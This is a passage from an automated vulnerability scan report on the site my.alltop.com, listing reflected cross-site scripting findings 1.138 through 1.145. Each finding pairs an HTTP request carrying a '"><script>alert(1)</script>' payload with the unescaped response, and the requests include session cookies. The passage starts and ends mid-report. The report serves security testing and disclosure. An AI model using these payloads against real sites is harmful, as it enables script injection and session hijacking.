Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:47 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:48 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:48 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h'%22--%3E%3C/style%3E%3C5430b"><script>alert(1)</script>c9395a1a119/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.138. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9915b"><script>alert(1)</script>081dc73b5e3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C9915b"><script>alert(1)</script>081dc73b5e3/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:50 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C9915b"><script>alert(1)</script>081dc73b5e3/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.139. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c637f"><script>alert(1)</script>c765f498bc2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3Ec637f"><script>alert(1)</script>c765f498bc2 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:53 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:54 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:54 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3Ec637f"><script>alert(1)</script>c765f498bc2" method="post" accept-charset="utf-8">
...[SNIP]...

1.140. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c84bb"><script>alert(1)</script>6624dab7d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E?c84bb"><script>alert(1)</script>6624dab7d0=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:41 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:42 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:42 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E?c84bb"><script>alert(1)</script>6624dab7d0=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.141. http://my.alltop.com/alpha/h/%22ns=%22netsparker(0x0001B3) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h/%22ns=%22netsparker(0x0001B3)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7090"><script>alert(1)</script>4080506e10f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/hd7090"><script>alert(1)</script>4080506e10f/%22ns=%22netsparker(0x0001B3) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:47 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:48 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:48 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/hd7090"><script>alert(1)</script>4080506e10f/%22ns=%22netsparker(0x0001B3)" method="post" accept-charset="utf-8">
...[SNIP]...

1.142. http://my.alltop.com/alpha/h/%22ns=%22netsparker(0x0001B3) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h/%22ns=%22netsparker(0x0001B3)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 873d0"><script>alert(1)</script>0d24925d5e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h/%22ns873d0"><script>alert(1)</script>0d24925d5e5=%22netsparker(0x0001B3) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:50 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:52 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:52 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h/%22ns873d0"><script>alert(1)</script>0d24925d5e5=%22netsparker(0x0001B3)" method="post" accept-charset="utf-8">
...[SNIP]...

1.143. http://my.alltop.com/alpha/h/%22ns=%22netsparker(0x0001B3) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h/%22ns=%22netsparker(0x0001B3)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f80a"><script>alert(1)</script>c983759053d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h/%22ns=%22netsparker(0x0001B3)?6f80a"><script>alert(1)</script>c983759053d=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:45 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:46 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:46 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h/%22ns=%22netsparker(0x0001B3)?6f80a"><script>alert(1)</script>c983759053d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.144. http://my.alltop.com/alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ca05"><script>alert(1)</script>359e354c8be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h7ca05"><script>alert(1)</script>359e354c8be/%2522ns%253D%2522netsparker%25280x0001B8%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:46 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:48 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:48 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h7ca05"><script>alert(1)</script>359e354c8be/%2522ns%253D%2522netsparker%25280x0001B8%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.145. http://my.alltop.com/alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf340"><script>alert(1)</script>fc2ec1a21ae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

